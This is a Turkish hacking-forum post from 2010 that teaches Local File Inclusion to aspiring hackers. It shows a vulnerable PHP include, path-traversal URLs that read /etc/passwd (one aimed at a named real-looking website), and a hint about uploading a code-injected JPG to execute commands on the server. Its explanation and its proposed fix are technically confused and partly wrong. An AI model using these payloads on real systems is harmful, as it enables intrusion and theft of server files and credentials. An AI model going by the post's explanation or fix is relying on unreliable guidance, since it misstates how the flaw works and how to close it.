İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

LFI Local File İnclude // Sırf RFI Öğrenmeyin! Okuyun!

19-09-2010 15:48
#1
Üyelik tarihi:
05/2010
Nereden:
FF
Mesajlar:
1.861
Teşekkür (Etti):
102
Teşekkür (Aldı):
463
Konular:
572
Ticaret:
(0) %
Rfi kadar işlevselliği olmayan ama her Hacker adayı için bilmesi gereken bir açık türü olan LFI yi anlatacağım.

1 ) LFI nedir ?

Lfı uzaktan servera dosya ekleme dahil etme anlamına gelir.

2 ) Rfi Kadar etkilimidir ?
Rfi kadar etkili olamasada yeterlidir.

Kullanımını Anlatayım

<?php
include ('data/$miller/function.php');
?>

burda gördünüz gibi rfi olarak düşünürsen miller
tanımlanmamış .

fakat bu lfi de shell olarak kullanılamaz tanımlanmayan degişken (miller)kullanılarak dosya okunabilir yukarıdaki kodu robot.php olarak kaydedin

Daha sonra

http://www.herhangisite.com/robot.php?miller=../../../TurkHackTeam

dosyası okunabilir izin varsa okunur bu
açıkla neler yapılır ?

etc/passwd , config okuruz ya da ftp alırız ...

LFI açığını Nasıl Kapatırız ?

<?php
$miller='sdwd'
include ('data/$miller/function.php');
?>

bu kod sayesinde açık kapaır çünkü miller 'i burda tanımladık

http://www.herhangisite.com/robot.php?miller=../../../TurkHackTEam

yaptığınız an LFI çalışmaz

Örnek LFI :

http://charlotte-wilson.net/view.php?list=..%2F..%2F..%20%2F..%2F..%2F..%2F..% 2F..%2F..%2F..%2Fetc%2Fpasswd

Not: Lfi açığı olan sisteme kod enjekte edilmiş bir jpg dosya atılarak server üzerinde işlem yapılabilir.
Elmino Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı